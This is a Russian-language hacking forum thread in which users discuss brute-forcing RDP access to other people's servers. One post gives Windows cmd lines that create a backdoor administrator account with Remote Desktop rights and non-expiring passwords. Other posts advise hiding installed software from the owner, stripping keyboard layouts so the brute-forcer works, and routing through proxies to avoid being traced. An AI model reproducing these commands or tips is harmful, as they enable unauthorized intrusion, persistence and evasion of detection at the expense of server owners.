Ответ :Очень просто , а точнее не как Пинг зависит от ширины канала и его загруженности если канал большой а он загружен каким то приложением то можно уменьшить пинг taskmgr и закрыть не нужные приложения
Приветствую! Вышло збрутить пару китайских дедов...неподскажете как там язык поменять, ато вообще не чего не пойму))
вот тоже , только что поимел Китайский дед , в cmd пиши следующие : Code: net user user pass /add net localgroup Administrators user /add net localgroup "Remote Desktop Users" user /add net accounts /maxpwage:unlimited exit ps я уже в деде
...я сижу на другой учетке, под другим пассом не думаю что админ туда станет лезть. А все таки где там языки нащупать: зохужу в "Языки" а там все страны на кИтАйском))
так установи WinRAR на деде, а потом просто убери его из списка установленых програм...и админ ничего не попалит
У меня вопрос! Если я на деде бручу дедики и в окнах подключения к удалённому рабочему столу там где вводить логин пароль, там стоит язык ввода RU никак не повлияет на работу брута? ну пароли то все на английском... И ещё вопрос. Почему винда инглиш а в окне написано по русски "Удалённый рабочий стол"
Повлияет конечно,т.к. он будет набирать например пароль admin,а будет писаться фвьшт,т.е. пароль не подберется,тебе надо удалить RU из настроек языков Есть предположение,Что ты заменив версию RDP 5.0 стояла русская)
У меня ещё вопрос. Если я допустим натворю что нибудь серьёзное и буду юзать дедики, меня смогут найти?
а практически? и если можно поподробней... или посоветуйте ещё как обезопасить себя... может заходить в дедик через прокси? ну поставить проксифайрер например